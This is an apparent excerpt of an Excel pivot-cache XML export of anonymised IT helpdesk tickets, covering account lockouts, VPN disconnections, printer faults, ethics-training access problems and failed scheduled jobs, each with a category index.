    <s v="name:alparslanthyr_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:lanigpkq.qzhakunx@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:hello,_x000a_i am still unable to &quot;salesperson&quot; and &quot;uacyltoe hxgaycze performed by&quot; in engineering_tool.could you help me?_x000a_"/>
    <s v="lanigpkq qzhakunx"/>
    <x v="25"/>
  </r>
  <r>
    <s v="not able to login to ethics portal_ kxmidsga zokivdfa"/>
    <s v="_x000d__x000a__x000d__x000a_received from: kxmidsga.zokivdfa@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a_i am not able to login to ethics portal. the error screen shot attached below._x000d__x000a_kindly do the need full._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_35e3c.6cd364f0]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_with best "/>
    <s v="kxmidsga zokivdfa"/>
    <x v="23"/>
  </r>
  <r>
    <s v="please provide access to m drive"/>
    <s v="_x000a__x000a_received from: dshferby.houtnzdi@gmail.com_x000a__x000a_dear it team,_x000a__x000a_good morning._x000a_please provide full control access to below paths, for the below members (markhtyed cc)._x000a__x000a_departments (\\HostName_95&lt;file:///\\HostName_95&gt;) (m:)\k100 scorecard_india iscl_x000a_departments (\\HostName_95&lt;file:///\\HostName_95&gt;) (m:)\k100 updates_india iscl_x000a__x000a_sagfhoshgzpkmilu skwbuvjyheelavant santthyumar.shtyhant@company.com&lt;mailto:santthyumar.shtyhant@company.com&gt;_x000a_ fahdlecz ubcszaohygexqab.cvihupnk@gmail.com&lt;mailto:cygexqab.cvihupnk@gmail.com&gt;_x000a_ erathyur dbrugslc.ydwtsunh@gmail.com&lt;mailto:dbrugslc.ydwtsunh@gmail.com&gt;_x000a_ihkolepb ozhnjyef ihkolepb.ozhnjyef@gmail.com&lt;mailto:ihkolepb.ozhnjyef@gmail.com&gt;_x000a_njdxwpvg.onlehdsi@gmail.com&lt;mailto:njdxwpvg.onlehdsi@gmail.com&gt;_x000a_culixwse pmrvxbnjhivaramdntyaiah wkzrenmj.vsyctbzk@gmail.com&lt;mailto:wkzrenmj.vsyctbzk@gmail.com&gt;_x000a__x000a__x000a_"/>
    <s v="dshferby houtnzdi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="issue with bobj"/>
    <s v="dear all,_x000d__x000a__x000d__x000a_can you please fix the bobj problem for mjvfxnka zvjxuahe. see below error message._x000d__x000a__x000d__x000a_"/>
    <s v="mjvfxnka zvjxuahe"/>
    <x v="8"/>
  </r>
  <r>
    <s v="problems with wifi"/>
    <s v="_x000d__x000a__x000d__x000a_received from: hpeknoam.yrfowmva@gmail.com_x000d__x000a__x000d__x000a_good morning,_x000d__x000a__x000d__x000a_i use my dell latitude 7350 in my home office using my own wifi network for internet access._x000d__x000a_often when i wake it up from powersave mode it is still connected to my local wifi network, but as a â€žnot identified&quot; network with no internet connection. my private owned devices (pc, smartphone,tablet) still work fine._x000d__x000a_i have to shut down and restart the dell again to get a proper connection._x000d__x000a__x000d__x000a_please advise what to do, as restarting the dell a couple of times over the day is annoying and time kirtyling._x000d__x000a__x000d__x000a_best "/>
    <s v="hpeknoam yrfowmva"/>
    <x v="0"/>
  </r>
  <r>
    <s v="timecards access in ticketing_tool"/>
    <s v="i have noticed that i don't have access to timecards in my ticketing_tool. can i have it enabled? "/>
    <s v="gpabsizh txldupyk"/>
    <x v="35"/>
  </r>
  <r>
    <s v="job HostName_1019failagain failed in job_scheduler at: 10/04/2016 02:31:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019failagain failed in job_scheduler at: 10/04/2016 02:31:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="pgi for delivery note 9169475765 not possible"/>
    <s v="pgi for delivery note 9169475765 not possible -&gt; please see enclosed message_x000d__x000a__x000d__x000a_"/>
    <s v="tvmlrwkz rsxftjep"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job HostName_1019fail failed in job_scheduler at: 10/04/2016 02:21:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019fail failed in job_scheduler at: 10/04/2016 02:21:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="savwzktn huqxbfot"/>
    <x v="0"/>
  </r>
  <r>
    <s v="kann sich nicht anmelden"/>
    <s v="kann sich nicht anmelden"/>
    <s v="bwafcjmt wutqczgh"/>
    <x v="32"/>
  </r>
  <r>
    <s v="do i have to worry about this?"/>
    <s v="_x000d__x000a__x000d__x000a_received from: hbmwlprq.ilfvyodx@gmail.com_x000d__x000a__x000d__x000a_[cid:image001.png@01SID_35e17.ad30bfe0]_x000d__x000a__x000d__x000a_mit freundlichem gruÃŸ / kind "/>
    <s v="hbmwlprq ilfvyodx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to HostName_589 vsphere client."/>
    <s v="unable to login to HostName_589 vsphere client._x000d__x000a_vmware virtualcenter server service is in stopped state."/>
    <s v="zgemhkby lgwkstcb"/>
    <x v="11"/>
  </r>
  <r>
    <s v="material specification code"/>
    <s v="the material code trn-hdt-kmc026 is available in the erp system, but when selecting it in engineering tool, there is an error ... no material code exists"/>
    <s v="ctvaejbo mjcerqwo"/>
    <x v="10"/>
  </r>
  <r>
    <s v="plm7 enterprise search for engineering records not working"/>
    <s v="hello, since a while the plm7 enterprise search for engineering records is not working on my pc. a plugin is missing according to the error messages in the status bar. see attachments._x000d__x000a_"/>
    <s v="nobwzdvh yqjugexl"/>
    <x v="10"/>
  </r>
  <r>
    <s v="request to reset microsoft online services password for tyhufrey.thyel@company.com"/>
    <s v="   request to reset user's password   _x000a_   the following user in your organization has requested a password reset be performed for their account: _x000a__x000a_â€¢ tyhufrey.thyel@company.com _x000a_â€¢ first name: tyhufrey _x000a_â€¢ last name: thyel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s v="oebrjdqc nhuqmskw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1329 failed in job_scheduler at: 10/04/2016 00:50:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1329 failed in job_scheduler at: 10/04/2016 00:50:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="vh 27 - werk germany - fehlende druckauftrÃ¤ge  - eilt monatswechsel!!!"/>
    <s v="_x000d__x000a_bei drucker vh 27 keine ausgabe der druckauftrÃ¤ge aus erp-hrp. druck aus word/excel funktioniert._x000d__x000a_drucker wurde bereits ausgeschaltet und neu gestartet ohne erfolg!_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_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_x000d__x000a_ _x000d__x000a_   â€¢  detailed description of the problem ?_x000d__x000a__x000d__x000a_   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) _x000d__x000a_      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc)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ucawbivs ountxzir"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ethics_application not found"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vfoyenlw.ntpbdeyf@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i am not able to open the ethics training course._x000d__x000a__x000d__x000a_please see the below error screenshot._x000d__x000a__x000d__x000a_[cid:image009.jpg@01SID_35e24.ec8a53b0]_x000d__x000a__x000d__x000a_with "/>
    <s v="vfoyenlw ntpbdeyf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ethics login issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ohdrnswl.rezuibdt@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_please see highlighted error and resolve it on urgent basis._x000d__x000a__x000d__x000a_[cid:image001.png@01SID_35e21.0bf7a9e0]_x000d__x000a__x000d__x000a_best "/>
    <s v="ohdrnswl rezuibdt"/>
    <x v="23"/>
  </r>
  <r>
    <s v="unable to login to ethics training course"/>
    <s v="hi, when i'm trying to login to ethics training course, i get the web page as unregistered user. please can you help in this."/>
    <s v="aqourvgz mkehgcdu"/>
    <x v="23"/>
  </r>
  <r>
    <s v="issue playing courage change win video"/>
    <s v="_x000d__x000a__x000d__x000a_received from: saerpwno.qsdfmakc@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_can you please help me with this message which i got when i tried to open the lauacyltoe hxgaycze video on &quot;courage change win&quot;_x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_35e1d.9b7d2300]_x000d__x000a__x000d__x000a_"/>
    <s v="saerpwno qsdfmakc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to print from wy33 printer"/>
    <s v="unable to print from wy33 printer_x000a___________________________________x000a__x000a_ic_x000a_ welcome, our next available agent will be with you shortly..._x000a_ interaction alerting agent._x000a_ website visitor has joined the conversation_x000a_dwfiykeo argtxmvcumar3_x000a_ hello_x000a_zheqafyo bqirpxag_x000a_ hi, good moryctrhbkm plvnuxmrnoj_x000a_ i could not print in wy33 printer.. i am in india_x000a_zheqafyo bqirpxag_x000a_ hi, are you there?_x000a_dwfiykeo argtxmvcumar3_x000a_ yes_x000a_zheqafyo bqirpxag_x000a_ this problem happens every month,_x000a_dwfiykeo argtxmvcumar3_x000a_ ok, let me check with local it_x000a_ where are you right now, in which deppt?_x000a_"/>
    <s v="cowsvzel ryhkefwv"/>
    <x v="18"/>
  </r>
  <r>
    <s v="install lauacyltoe hxgaycze version of flash player"/>
    <s v="_x000d__x000a__x000d__x000a_received from: saerpwno.qsdfmakc@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_can you please install the lauacyltoe hxgaycze version of flash player on my system? i got this message (which is shown below) while i tried to complete the ethics course on our collaboration_platform site._x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_35e1b.fb25e280]_x000d__x000a__x000d__x000a_"/>
    <s v="saerpwno qsdfmakc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_keheu2 failed in job_scheduler at: 10/03/2016 23:06:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_keheu2 failed in job_scheduler at: 10/03/2016 23:06:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="SID_51 password"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qycgdfhz.iqshzdru@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_please reset my password for SID_51 to daypay3._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="qycgdfhz iqshzdru"/>
    <x v="19"/>
  </r>
  <r>
    <s v="erp performances this morning via vpn germany"/>
    <s v="_x000a__x000a_received from: blktuiae.jzakfmhw@gmail.com_x000a__x000a_hi it_x000a_i started an report this  morning and it takes  normal 10 minute to get the result_x000a_current the report ist still running after 35 minutes_x000a_do we have a performance issue with erp_x000a__x000a_my user id is:  wethruiberg_x000a__x000a_"/>
    <s v="blktuiae jzakfmhw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="collaboration_platform site is not opening"/>
    <s v="collaboration_platform site is not opening"/>
    <s v="anpocezt qturbxsg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="changes in ad"/>
    <s v="hi, there,_x000d__x000a_my reporting line in the outlook organization system is wrong. i have been relocated from usa to apac and now report to vlpfgjyz dvzrfsbo. my title is sr. engineer, r&amp;d which is not reflected in the system too. please help to correct. "/>
    <s v="ywbnzxud qzwrynux"/>
    <x v="19"/>
  </r>
  <r>
    <s v="flash player version"/>
    <s v="_x000d__x000a__x000d__x000a_received from: elixsfvu.pxwbjofl@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_please help to assist the following issue._x000d__x000a__x000d__x000a_"/>
    <s v="elixsfvu pxwbjofl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i can't log into the vpn or ticketing_tool. i changed my password this morning and now it is not working"/>
    <s v="from: dartnl porwrloisky [mailto:mreocsnk.swoyxzma@gmail.com] _x000a_sent: monday, october 03, 2016 11:35 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject: rakthyesh login problems with vpn_x000a__x000a_hi._x000a__x000a_i can't log into the vpn or ticketing_tool. i changed my password this morning and now it is not working_x000a_can you please reset my login?_x000a_my username is poloidgthyl_x000a__x000a_i keep getting this error:_x000a_ _x000a__x000a_danl poloisky_x000a_territory manager_x000a_ _x000a_m (330) 260-5038_x000a_f  (330) 343-4705_x000a_mreocsnk.swoyxzma@gmail.com_x000a_| 2605 federal signal dr | usa, il 60484 |      _x000a__x000a_"/>
    <s v="mreocsnk swoyxzma"/>
    <x v="0"/>
  </r>
  <r>
    <s v="summary:when i run wip list and try to do my report i get run time error 1004.pivot table field name not valid."/>
    <s v="summary:when i run wip list and try to do my report i get run time error 1004.pivot table field name not valid."/>
    <s v="gdpxqyhj iapghvke"/>
    <x v="0"/>
  </r>
  <r>
    <s v="issues with crm dynamics"/>
    <s v="issues with crm dynamics. need permissions. while opening records user is getting error record is unavailable. the request record was not found or you do not have sufficient permissions to view it._x000d__x000a_"/>
    <s v="fsvnjexu yxaevupi"/>
    <x v="22"/>
  </r>
  <r>
    <s v="my account will expire soon, please help to extend vvwhtyuy account for one year.. / user : vvwhtyuy / manager name: mikdhyu lihy"/>
    <s v="my account will expire soon, please help to extend vvwhtyuy account for one year.. / user : vvwhtyuy / manager name: mikdhyu lihy"/>
    <s v="hlrmufzx qcdzierm"/>
    <x v="19"/>
  </r>
  <r>
    <s v="do not receive information"/>
    <s v="_x000d__x000a__x000d__x000a_received from: duoyrpvi.wgjpviul@gmail.com_x000d__x000a__x000d__x000a_hi team,_x000d__x000a__x000d__x000a_i originally enquiries about this at the start of august and nothing has been amended._x000d__x000a__x000d__x000a_currently i do not receive any email notifications for the likes of ethics/ethical moments/sipppr's._x000d__x000a__x000d__x000a_and now i have tried to log into ethics via collaboration_platform and received the following error message:_x000d__x000a__x000d__x000a_&quot;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quot;_x000d__x000a__x000d__x000a_can you please assist aerp in setting up these notifications._x000d__x000a__x000d__x000a_"/>
    <s v="nehxmtpg xepltzqf"/>
    <x v="19"/>
  </r>
  <r>
    <s v="blank call"/>
    <s v="blank call"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="kicked off of vpn"/>
    <s v="i was kicked off of vpn for the 3rd time today at about 5:45pm.  "/>
    <s v="gakceqyb edrjthvo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="potential security issue with the ios 10 update "/>
    <s v="potential security issue with the ios 10 update "/>
    <s v="cyxieuwk rekwlqmu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook error "/>
    <s v="outlook error "/>
    <s v="pgrqbizd tolwefig"/>
    <x v="0"/>
  </r>
  <r>
    <s v="urgent help required-outlook to crm mfg_tooltion issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: fjohugzb.fhagjskd@gmail.com_x000d__x000a__x000d__x000a_helloâ€¦_x000d__x000a__x000d__x000a_there is no crm tab in my outlook ribbon, please advise._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_35d92.SID_2628051]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_fjohugzb fhagjskd_x000d__x000a_sr. channel partner specialist_x000d__x000a_company inc._x000d__x000a_fjohugzb.fhagjskd@gmail.com&lt;mailto:fjohugzb.fhagjskd@gmail.com&gt;_x000d__x000a_p 800-446-7738 (office)_x000d__x000a_m 705-760-3495_x000d__x000a_technical support 800-835-3668_x000d__x000a_na-company.techsupport@company.com_x000d__x000a_www.company.com&lt;_x000d__x000a__x000d__x000a_"/>
    <s v="fjohugzb fhagjskd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to wireless"/>
    <s v="user called in for an issue where he was not able to connect to any wireless network. he's using the dell 7350 tablet device. "/>
    <s v="udetjzmn ayueswcm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to update new password on iphone"/>
    <s v="unable to update new password on iphone"/>
    <s v="fjohugzb fhagjskd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to update passwords for all accounts"/>
    <s v="unable to update passwords for all accounts"/>
    <s v="fjohugzb fhagjskd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage : cantabria (mecftgobusa) site hard down since 2:53 pm et on 10/03."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _____no____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   __________ 2:53 pm et on 10/03.____________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? 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ethics training"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rolcgqhx.ehndjmlv@gmail.com_x000d__x000a__x000d__x000a_hello, i started ethics training, it became stuck on page 7_x000d__x000a_please contact me aerp_x000d__x000a__x000d__x000a_best "/>
    <s v="rolcgqhx ehndjmlv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open/edit expense report for employee"/>
    <s v="unable to open/edit expense report for employee"/>
    <s v="vyluaepi dtwfaejr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cannot log in"/>
    <s v="_x000a__x000a_received from: zwirhcol.narzlmfw@gmail.com_x000a__x000a_marty nevins username nevinmw cannot login to a computer._x000a__x000a_j. shrugott tyhuellis_x000a_usa facilities mgr._x000a_zwirhcol.narzlmfw@gmail.com&lt;mailto:zwirhcol.narzlmfw@gmail.com&gt;_x000a_"/>
    <s v="zwirhcol narzlmfw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to safe attachment on erp"/>
    <s v="when i try to safe a file to a sales order in erp i received the fallowing error _x000d__x000a_an error occurred when uploading to erp knowledge_x000d__x000a_provider._x000d__x000a_"/>
    <s v="zwqveghb rxdmstng"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sales history not correct in apo (dp)"/>
    <s v="_x000a__x000a_received from: koqntham.sqiuctfl@gmail.com_x000a__x000a_jochgthen / it team,_x000a__x000a_there appears to be an issue with the history in apo. only the september history looks correct._x000a_[cid:image003.jpg@01SID_35SID_25.6236c930]_x000a__x000a_"/>
    <s v="koqntham sqiuctfl"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_3194 failed in job_scheduler at: 10/03/2016 14:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3194 failed in job_scheduler at: 10/03/2016 14:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="external site not loading"/>
    <s v="external site not loading"/>
    <s v="wbtrvdsi gdbuvszx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account unlock"/>
    <s v="account unlock"/>
    <s v="erckhtzj tdmkgoie"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm in outlook not working // grethyg"/>
    <s v="crm in outlook not working // grethyg"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account unlock"/>
    <s v="windows account unlock"/>
    <s v="syclwnxe jhgdesun"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account lockout"/>
    <s v="windows account lockout"/>
    <s v="vupmctne ylnsweao"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="rtpmlwnk unpambrv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to sign in to skype"/>
    <s v="unable to sign in to skype"/>
    <s v="kvqtzayg ehjrviak"/>
    <x v="0"/>
  </r>
  <r>
    <s v="getting knocked off vpn"/>
    <s v="was knocked off vpn about 1:10pm et today and then again about 1:45pm et.  i have a problem with being knocked off almost every day."/>
    <s v="gakceqyb edrjthvo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="all of my purchasing suppliers in the us are stated as do not use."/>
    <s v="my purchasing catalogs are no longer there. when i try and re-select them all the us supplier say, do not use"/>
    <s v="xwyrvcbj bmqfszjg"/>
    <x v="29"/>
  </r>
  <r>
    <s v="vpn connectivity issues"/>
    <s v="my vpn dropped twice this morning and twice since lunch"/>
    <s v="wsomjhce afjkuwih"/>
    <x v="19"/>
  </r>
  <r>
    <s v="unable to enter an estimated value in opportunities in ms crm"/>
    <s v="unable to enter an estimated value in opportunities in ms crm"/>
    <s v="wanyrjkg tsycmeof"/>
    <x v="22"/>
  </r>
  <r>
    <s v="unable to sign in to outlook"/>
    <s v="unable to sign in to outlook"/>
    <s v="jmusidzr sratdeol"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset windows password for all accounts"/>
    <s v="reset windows password for all accounts"/>
    <s v="ycazngpi mdsqixlr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to erp"/>
    <s v="unable to login to erp"/>
    <s v="jmusidzr sratdeol"/>
    <x v="0"/>
  </r>
  <r>
    <s v="printing request - request transaction print to a different printer.  please contact omiwzbue auvolfhp for info."/>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prtqv0072 &amp; prtqv0001_x000d__x000a_ _x000d__x000a_   â€¢  detailed description of the problem ?_x000d__x000a__x000d__x000a_   â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) _x000d__x000a_      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc)_x000d__x000a_erp_x000d__x000a_   â€¢  what system or application being used at time of the problem?      (ex windows / erp /kls)_x000d__x000a_erp / windows_x000d__x000a_   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed?_x000d__x000a__x000d__x000a_   â€¢  if erp system, which system?   (ex SID_34 / SID_38 / hrp / plm)SID_34_x000d__x000a__x000d__x000a_      â€¢  if it's an erp printer problem can the erp output be rerouted to another erp printer temporarily?_x000d__x000a_         what printer can it be rerouted too? currently qv01 is being routed to qv72. _x000d__x000a_qv01 is now fixed and i need all erp jobs to print on qv01 not qv72._x000d__x000a__x000d__x000a_   â€¢  if document is not printing correctly, please scan copy of the document and attach to the ticketing_tool ticket"/>
    <s v="omiwzbue auvolfhp"/>
    <x v="44"/>
  </r>
  <r>
    <s v="password change"/>
    <s v="password change"/>
    <s v="oqzgvkrh jiylqwtc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to skype"/>
    <s v="unable to login to skype"/>
    <s v="tqemuawj mvcqrbaz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i have old version ethics training on my account, please help me. thank you"/>
    <s v="i have old version ethics training on my account, please help me. "/>
    <s v="kzusmblv lnkbxdst"/>
    <x v="23"/>
  </r>
  <r>
    <s v="map i drive"/>
    <s v="map i drive"/>
    <s v="cifgxham iuzefkha"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm not synching mails"/>
    <s v="crm not synching mails"/>
    <s v="grtaoivq dwjvfkqe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn / erp log out"/>
    <s v="_x000a__x000a_received from: mnlvhtug.imvetgoa@gmail.com_x000a__x000a_this is getting tiresome being logged out of vpn automatically while working on erp._x000a__x000a_cant seem to get much done if i have to keep logging back on._x000a__x000a_this needs to be fixed.._x000a_[cid:image001.jpg@01SID_35d77.bb454b00]_x000a__x000a_mnlvhtug imvetgoa_x000a_sr. application engineer_x000a_general engineering_x000a_company inc._x000a_mnlvhtug.imvetgoa@gmail.com&lt;mailto:mnlvhtug.imvetgoa@gmail.com&gt;_x000a_[cid:image001.png@01d15842.000812f0]_x000a__x000a__x000a__x000a__x000a__x000a__x000a_"/>
    <s v="mnlvhtug imvetgoa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user wish to set lan as first priority for internet "/>
    <s v="user wish to set lan as first priority for internet  but my laptop makes wireless first priority and disconnect from lan and connect to wireless_x000a__x000a_pc name: ldvl8517832_x000a__x000a__x000a_"/>
    <s v="rozsyfai zncajubh"/>
    <x v="2"/>
  </r>
  <r>
    <s v="external caller asking for vtykrubi whsipqno's email address"/>
    <s v="external caller asking for vtykrubi whsipqno's email address"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open an website"/>
    <s v="unable to open an website"/>
    <s v="wzbqmhdf gxsiadqw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unlock erp SID_34 account"/>
    <s v="unlock erp SID_34 account"/>
    <s v="vydbqise wkjrmxqh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="help to install - engineering_tool to other peoples (no-company)"/>
    <s v="hi team, _x000a__x000a_i need your help, we have a people than isn't employee company, but needed install engineering_tool in a computer. they're client company, he has id (ccfterguss) to acces site  engineering_tool, but in hour that install appears the error in attachment, do you have a instructions to install in computers no-company."/>
    <s v="qasdhyzm yuglsrwx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="monitor on wire pc is out."/>
    <s v="monitor on wire pc is out."/>
    <s v="leyvdwjt biaklozn"/>
    <x v="2"/>
  </r>
  <r>
    <s v="unable to find name as sales person in engineering tool"/>
    <s v="unable to find name as sales person in engineering tool. _x000a__x000a_phone: "/>
    <s v="lanigpkq qzhakunx"/>
    <x v="25"/>
  </r>
  <r>
    <s v="windows account lockout"/>
    <s v="windows account lockout"/>
    <s v="gxibtzek fgkpqjsb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="usa plant : all the switches and servers are down at the site at 11:45 am et on 10/03. "/>
    <s v="usa plant : all the switches and servers are down at the site at 11:45 am et on 10/03. "/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="7"/>
  </r>
  <r>
    <s v="internet is down"/>
    <s v="lwgytuxq qspdztiw called in for an issue where the internet is completely down and they are unable to access internet, erp and all other applications._x000a__x000a_contact no - "/>
    <s v="lwgytuxq qspdztiw"/>
    <x v="3"/>
  </r>
  <r>
    <s v="outlook calendar shatryung"/>
    <s v="_x000a__x000a_received from: gdnwlkit.jokidavy@gmail.com_x000a__x000a_tried to share my calendar in outlook with my manager, rick orelli, and got this error message_x000a__x000a__x000a_[cid:image001.png@01SID_35SID_28.edb479b0]_x000a__x000a_biintll tujutnis_x000a_senior sales engineer wc1 team_x000a_gdnwlkit.jokidavy@gmail.com&lt;mailto:gdnwlkit.jokidavy@gmail.com&gt;_x000a__x000a_www.company.com&lt;_x000a__x000a_"/>
    <s v="gdnwlkit jokidavy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="quotes in workflow "/>
    <s v="from: wjslkzfr jxlbzwrp _x000d__x000a_sent: monday, october 03, 2016 7:50 pm_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: re: quotes in workflow _x000d__x000a__x000d__x000a_hi , _x000d__x000a__x000d__x000a_i have 2 items in workflow that i am unable to save out. it appears the quote was deleted._x000d__x000a_3116211904 lines 110 and 120_x000d__x000a_please help me get these saved out._x000d__x000a__x000d__x000a_"/>
    <s v="wjslkzfr jxlbzwrp"/>
    <x v="12"/>
  </r>
  <r>
    <s v="unable to open outlook after changing password"/>
    <s v="unable to open outlook after changing password"/>
    <s v="vupmctne ylnsweao"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to skype"/>
    <s v="name:ksgytjqr ojdukgzc_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:ksgytjqr.ojdukgzc@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:can't sign into skype"/>
    <s v="ksgytjqr ojdukgzc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ethics"/>
    <s v="_x000a__x000a_received from: soujqrxw.mvwduljx@gmail.com_x000a__x000a_i have made several attempts to access ethics training and it doesn't connect._x000a__x000a_soujqrxw mvwduljx_x000a_company, inc._x000a_sales engineer, usa._x000a_cell _x000a_soujqrxw.mvwduljx@gmail.com&lt;mailto:soujqrxw.mvwduljx@gmail.com&gt;_x000a_customer service   ftmill.service@company.com&lt;mailto:ftmill.service@company.com&gt;_x000a_product support 8  na-company.techsupport@company.com&lt;mailto:na-company.techsupport@company.com&gt;_x000a__x000a__x000a__x000a_"/>
    <s v="soujqrxw mvwduljx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="7350 - no audio device"/>
    <s v="no audio device on the pc, failed to play uacyltoe hxgaycze tone."/>
    <s v="iqthfjvx qkpgrfzx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn issues"/>
    <s v="_x000d__x000a__x000d__x000a_received from: uvorgwts.mlqzaicb@gmail.com_x000d__x000a__x000d__x000a_hello i.t. team,_x000d__x000a__x000d__x000a_my vpn will not accept my username and password. please contact me at your earliest convenience._x000d__x000a__x000d__x000a_best "/>
    <s v="uvorgwts mlqzaicb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset from password_management_tool"/>
    <s v="password reset from password_management_tool"/>
    <s v="jvshydix rzpmnylt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip 2: ie crashes on opening mii from ess portal"/>
    <s v="vip 2: ie crashes on opening mii from ess portal_x000a__x000a_phone: "/>
    <s v="jwhmqnye xlpvdwre"/>
    <x v="2"/>
  </r>
  <r>
    <s v="renew internal certificate for password_management_tool id password manager"/>
    <s v="renew internal certificate for password_management_tool password manager"/>
    <s v="ugyothfz ugrmkdhx"/>
    <x v="19"/>
  </r>
  <r>
    <s v="e-mail and certificates not going to lean participants"/>
    <s v="today, i created a lean event in our collaboration_platform lean tracker and after submitting the event, no participant got any e-mail or lean certificate. lean tracker id for the event i created is 16100349662."/>
    <s v="fohvgnkd stfmcapj"/>
    <x v="15"/>
  </r>
  <r>
    <s v="unable to create a collaboration_platform collaboration_platform workbook on accounts due to duplicate detetection"/>
